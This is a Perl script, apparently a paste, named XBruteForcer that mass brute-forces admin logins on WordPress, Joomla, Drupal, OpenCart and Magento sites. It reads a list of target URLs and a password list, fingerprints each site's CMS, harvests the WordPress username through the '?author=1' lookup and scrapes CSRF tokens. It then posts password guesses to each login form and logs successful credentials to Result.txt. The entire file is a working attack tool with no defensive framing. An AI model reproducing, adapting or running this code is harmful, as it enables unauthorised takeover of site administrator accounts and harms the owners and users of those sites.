#!/usr/bin/perluse Win32::Console::ANSI; use Term::ANSIColor;use URI::UR

1. #!/usr/bin/perl
2.  
3. use Win32::Console::ANSI;
4. use Term::ANSIColor;
5. use URI::URL;
6. use Getopt::Long;
7. use LWP::UserAgent;
8. use IO::Socket::INET;
9. use HTTP::Request;
10. use HTTP::Cookies;
11. use HTTP::Request::Common qw(POST);
12. use HTTP::Request::Common qw(GET);
13.  
14. $ua = LWP::UserAgent->new(keep_alive => 1);
15. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
16. $ua->timeout (10);
17.  
18. if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
19.  
20. GetOptions(
21. "l|list=s" => \$list,
22. "p|passwords=s" => \$pass,
23. );
24.  
25. banner();
26.  
27. unless ($list|$pass) { help(); }
28. if ($list|$pass) { XBruteForcer(); }
29.  
30. sub banner() {
31. print color('bold red')," __ __ ";
32. print color('bold white')," ____ _ ______ \n";
33. print color('bold red')," \\ \\ / / ";
34. print color('bold white')," | _ \\ | | | ____| \n";
35. print color('bold red')," \\ V / ";
36. print color('bold white')," | |_) |_ __ _ _| |_ ___ | |__ __ _ __ ___ ___ _ __ \n";
37. print color('bold red')," > < ";
38. print color('bold white')," | _ <| '__| | | | _/ _ \\ | __/ _ \\| '__/ __/ _ \\ '__|\n";
39. print color('bold red')," / . \\ ";
40. print color('bold white')," | |_) | | | |_| | || __/ | | | (_) | | | (_| __/ | \n";
41. print color('bold red')," /_/ \\_\\ ";
42. print color('bold white')," |____/|_| \\__,_|\\__\\___| |_| \\___/|_| \\___\\___|_| ";
43. print color('bold red'),"v1.1\n\n";
44. print color('bold red'),"\t\t [";
45. print color('bold white'),"Coded BY Mohamed Riahi";
46. print color('bold red'),"]\n";
47. print color('reset');
48. };
49.  
50. sub help {
51. print q(
52. Usage: perl XBruteForcer.pl -l list.txt -p passwords.txt
53.  
54. OPTIONS:
55. -l => websites list
56. -p => Passwords list
57. );
58. }
59. sub XBruteForcer {
60. print color('bold red'),"[";
61. print color('bold green'),"1";
62. print color('bold red'),"]";
63. print color('bold white')," WordPress \n";
64. print color('bold red'),"[";
65. print color('bold green');
66. print color('bold green'),"2";
67. print color('bold red'),"]";
68. print color('bold white')," Joomla \n";
69. print color('bold red'),"[";
70. print color('bold green'),"3";
71. print color('bold red'),"]";
72. print color('bold white')," DruPal \n";
73. print color('bold red'),"[";
74. print color('bold green'),"4";
75. print color('bold red'),"]";
76. print color('bold white')," OpenCart \n";
77. print color('bold red'),"[";
78. print color('bold green'),"5";
79. print color('bold red'),"]";
80. print color('bold white')," Magento \n";
81. print color('bold red'),"[";
82. print color('bold green'),"6";
83. print color('bold red'),"]";
84. print color('bold white')," Auto \n";
85. print color('bold red'),"[";
86. print color('bold green'),"+";
87. print color('bold red'),"]";
88. print color('bold white')," Choose Number : ";
89.  
90. my $number = <STDIN>;
91. chomp $number;
92.  
93. if($number eq '1')
94. {
95. open (THETARGET, "<$list") || die "[-] Can't open the file";
96. @TARGETS = <THETARGET>;
97. close THETARGET;
98. $link=$#TARGETS + 1;
99.  
100. OUTER: foreach $site(@TARGETS){
101. chomp($site);
102.  
103. print "\n[*] URL: $site\n";
104. wpuser();
105. }
106. }
107.  
108. if($number eq '2')
109. {
110.  
111. open (THETARGET, "<$list") || die "[-] Can't open the file";
112. @TARGETS = <THETARGET>;
113. close THETARGET;
114. $link=$#TARGETS + 1;
115.  
116. OUTER: foreach $site(@TARGETS){
117. chomp($site);
118.  
119. print "\n[*] URL: $site\n";
120. joomla();
121. }
122. }
123.  
124. if($number eq '3')
125. {
126.  
127. open (THETARGET, "<$list") || die "[-] Can't open the file";
128. @TARGETS = <THETARGET>;
129. close THETARGET;
130. $link=$#TARGETS + 1;
131.  
132. OUTER: foreach $site(@TARGETS){
133. chomp($site);
134.  
135. print "\n[*] URL: $site\n";
136. drupal();
137. }
138. }
139.  
140. if($number eq '4')
141. {
142.  
143. open (THETARGET, "<$list") || die "[-] Can't open the file";
144. @TARGETS = <THETARGET>;
145. close THETARGET;
146. $link=$#TARGETS + 1;
147.  
148. OUTER: foreach $site(@TARGETS){
149. chomp($site);
150.  
151. print "\n\n[*] URL: $site\n";
152. opencart();
153. }
154. }
155.  
156. if($number eq '5')
157. {
158.  
159. open (THETARGET, "<$list") || die "[-] Can't open the file";
160. @TARGETS = <THETARGET>;
161. close THETARGET;
162. $link=$#TARGETS + 1;
163.  
164. OUTER: foreach $site(@TARGETS){
165. chomp($site);
166.  
167. print "\n\n[*] URL: $site\n";
168. magento();
169. }
170. }
171. if($number eq '6')
172. {
173.  
174. open (THETARGET, "<$list") || die "[-] Can't open the file";
175. @TARGETS = <THETARGET>;
176. close THETARGET;
177. $link=$#TARGETS + 1;
178.  
179. OUTER: foreach $site(@TARGETS){
180. chomp($site);
181.  
182. print "\n\n[*] URL: $site";
183. cms();
184. }
185. }
186. }
187.  
188. ################ CMS DETCTER #####################
189. sub cms(){
190. $magsite = $site . '/admin';
191. my $magcms = $ua->get("$magsite")->content;
192. my $cms = $ua->get("$site")->content;
193. if($cms =~/wp-content|wordpress/) {
194. print color("bold white"), " - WordPress\n\n";
195. wpuser();
196. }
197.  
198. elsif($cms =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>| \/media\/system\/js\/|com_content|Joomla!/) {
199. print color("bold white"), " - Joomla\n\n";
200. joomla();
201. }
202. elsif($cms =~/Drupal|drupal|sites\/all|drupal.org/) {
203. print color("bold white"), " - Drupal\n\n";
204. drupal();
205. }
206.  
207. elsif($cms =~/route=product|OpenCart|route=common|catalog\/view\/theme/) {
208. print color("bold white"), " - OpenCart\n\n";
209. opencart();
210. }
211.  
212. elsif($magcms =~/Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento/) {
213. print color("bold white"), " - Magento\n\n";
214. magento();
215. }
216. else{
217. print color("bold white"), " - Unknown\n\n";
218. }
219. }
220.  
221.  
222. ###### GET WP USER #######
223. sub wpuser{
224. print color('reset');
225. $user = $site . '/?author=1';
226.  
227. $getuser = $ua->get($user)->content;
228. if($getuser =~/author\/(.*?)\//){
229. $wpuser=$1;
230. print "[+] Username: $wpuser\n";
231. wp();
232. }
233. else {
234. print "Can't Get Username\n\n";
235. }
236. }
237.  
238. ###### WorDPress #######
239. sub wp{
240. print"[-] Starting brute force\n";
241. open(a,"<$pass") or die "$!";
242. while(<a>){
243. chomp($_);
244. $wp = $site . '/wp-login.php';
245. $redirect = $site . '/wp-admin/';
246. $wpass = $_;
247. print "[-] Trying: $wpass ";
248. $wpbrute = POST $wp, [log => $wpuser, pwd => $wpass, wp-submit => 'Log In', redirect_to => $redirect];
249. $response = $ua->request($wpbrute);
250. my $stat = $response->as_string;
251.  
252. if($stat =~ /Location:/){
253. if($stat =~ /wordpress_logged_in/){
254.  
255. print "- ";
256. print color('bold green'),"FOUND\n";
257. print color('reset');
258.  
259. open (TEXT, '>>Result.txt');
260. print TEXT "$wp ==> User: $wpuser Pass: $wpass\n";
261. close (TEXT);
262. next OUTER;
263. }
264. }
265. }
266. }
267. ###### Joomla #######
268. sub joomla{
269. $joomsite = $site . '/administrator/index.php';
270.  
271. $ua = LWP::UserAgent->new(keep_alive => 1);
272. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
273. $ua->timeout (30);
274. $ua->cookie_jar(
275. HTTP::Cookies->new(
276. file => 'mycookies.txt',
277. autosave => 1
278. )
279. );
280.  
281.  
282. $getoken = $ua->get($joomsite)->content;
283. if ( $getoken =~ /name="(.*)" value="1"/ ) {
284. $token = $1 ;
285. }else{
286. print "[-] Can't Grabb Joomla Token !\n";
287. next OUTER;
288. }
289.  
290. print"[-] Starting brute force";
291. open(a,"<$pass") or die "$!";
292. while(<a>){
293. chomp($_);
294. $joomuser = admin;
295. $joompass = $_;
296. print "\n[-] Trying: $joompass ";
297. $joomlabrute = POST $joomsite, [username => $joomuser, passwd => $joompass, lang =>en-GB, option => user_login, task => login, $token => 1];
298. $response = $ua->request($joomlabrute);
299.  
300. my $check = $ua->get("$joomsite")->content;
301. if ($check =~ /logout/){
302. print "- ";
303. print color('bold green'),"FOUND\n";
304. print color('reset');
305.  
306. open (TEXT, '>>Result.txt');
307. print TEXT "$joomsite => User: $joomuser Pass: $joompass\n";
308. close (TEXT);
309. next OUTER;
310. }
311. }
312. }
313.  
314. ######DruPal#######
315. sub drupal{
316. print"[-] Starting brute force";
317. open(a,"<$pass") or die "$!";
318. while(<a>){
319. chomp($_);
320. $druser = admin;
321. $drupass = $_;
322. print "\n[-] Trying: $drupass ";
323.  
324. $drupal = $site . '/user/login';
325. $redirect = $site . '/user/1';
326.  
327. $drupalbrute = POST $drupal, [name => $druser, pass => $drupass, form_build_id =>'', form_id => 'user_login',op => 'Log in', location => $redirect];
328. $response = $ua->request($drupalbrute);
329. $stat = $response->status_line;
330. if ($stat =~ /302/){
331. print "- ";
332. print color('bold green'),"FOUND\n";
333. print color('reset');
334.  
335. open (TEXT, '>>Result.txt');
336. print TEXT "$drupal => User: $druser Pass: $drupass\n";
337. close (TEXT);
338. next OUTER;
339. }
340. }
341. }
342.  
343. ###### OpenCart #######
344. sub opencart{
345. print"[-] Starting brute force";
346. open(a,"<$pass") or die "$!";
347. while(<a>){
348. chomp($_);
349. $ocuser = admin;
350. $ocpass = $_;
351. print "\n[-] Trying: $ocpass ";
352. $OpenCart= $site . '/admin/index.php';
353.  
354. $ocbrute = POST $OpenCart, [username => $ocuser, password => $ocpass,];
355. $response = $ua->request($ocbrute);
356. $stat = $response->status_line;
357. if ($stat =~ /302/){
358. print "- ";
359. print color('bold green'),"FOUND\n";
360. print color('reset');
361. open (TEXT, '>>Result.txt');
362. print TEXT "$OpenCart => User: $ocuser Pass: $ocpass\n";
363. close (TEXT);
364. next OUTER;
365. }
366. }
367. }
368.  
369. ###### Magento #######
370. sub magento{
371. $magsite = $site . '/admin';
372.  
373. $ua = LWP::UserAgent->new(keep_alive => 1);
374. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
375. $ua->timeout (30);
376. $ua->cookie_jar(
377. HTTP::Cookies->new(
378. file => 'mycookies.txt',
379. autosave => 1
380. )
381. );
382.  
383. $getoken = $ua->get($magsite)->content;
384. if ( $getoken =~ /type="hidden" value="(.*)"/ ) {
385. $token = $1 ;
386. }else{
387. print "[-] Can't Grabb Magento Token !\n";
388. next OUTER;
389. }
390.  
391. print"[-] Starting brute force";
392. open(a,"<$pass") or die "$!";
393. while(<a>){
394. chomp($_);
395. $maguser = "admin";
396. $magpass = $_;
397. print "\n[-] Trying: $magpass ";
398.  
399. $magbrute = POST $magsite, ["form_key" => "$token", "login[username]" => "$maguser", "dummy" => "", "login[password]" => "$magpass"];
400. $response = $ua->request($magbrute);
401. my $pwnd = $ua->get("$magsite")->content;
402. if ($pwnd =~ /logout/){
403. print "- ";
404. print color('bold green'),"FOUND\n";
405. print color('reset');
406. open (TEXT, '>>Result.txt');
407. print TEXT "$magsite => User: $maguser Pass: $magpass\n";
408. close (TEXT);
409. next OUTER;
410. }
411. }
412. }